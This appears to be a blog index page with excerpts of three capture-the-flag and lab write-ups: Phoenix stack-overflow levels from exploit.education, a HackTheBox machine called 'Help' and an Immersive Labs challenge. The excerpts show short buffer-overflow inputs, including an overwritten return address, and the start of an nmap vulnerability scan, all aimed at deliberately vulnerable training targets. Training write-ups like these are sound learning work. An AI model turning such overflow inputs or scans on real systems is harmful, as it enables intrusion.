WriteUp: Phoenix Exploit.Education

Writeup for the Phoenix VM from http://exploit.education/phoenix/. stack-onepython -c ‚print 64*“A“‚ stack-twoexport ExploitEducation=$“cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc\n\t\n\r“ learned about endianess here. really missing some of the basic computer science stuff, but well coming to it… stack-threeuser@phoenix-amd64:/opt/phoenix/amd64$ objdump stack-three -x | grep level user@phoenix-amd64:/opt/phoenix/amd64$ python -c ‚print „c“*64+“\x9d\x06@“‚ | ./stack-three Welcome to phoenix/stack-three, brought to you by https://exploit.education calling function … Read moreWriteUp: Phoenix Exploit.Education

HackTheBox writeup of „Help“

my first writeup for a hackthebox.eu machine called: Help, $ nmap -Pn –script vuln Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-11 13:22 CEST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for … Read moreHackTheBox writeup of „Help“

immune hacking group writeup

This is a quick writeup of the challenge https://immersivelabs.online/labs/cyber-warrior-immune-hacking-group which was funny :) In this warrior challenge you’ll need to follow the breadcrumbs to infiltrate an underground hacking community. You can find the community at their website, immunehackinggroup.tk – from here its all on you.  i found the first flag in the source code of … Read moreimmune hacking group writeup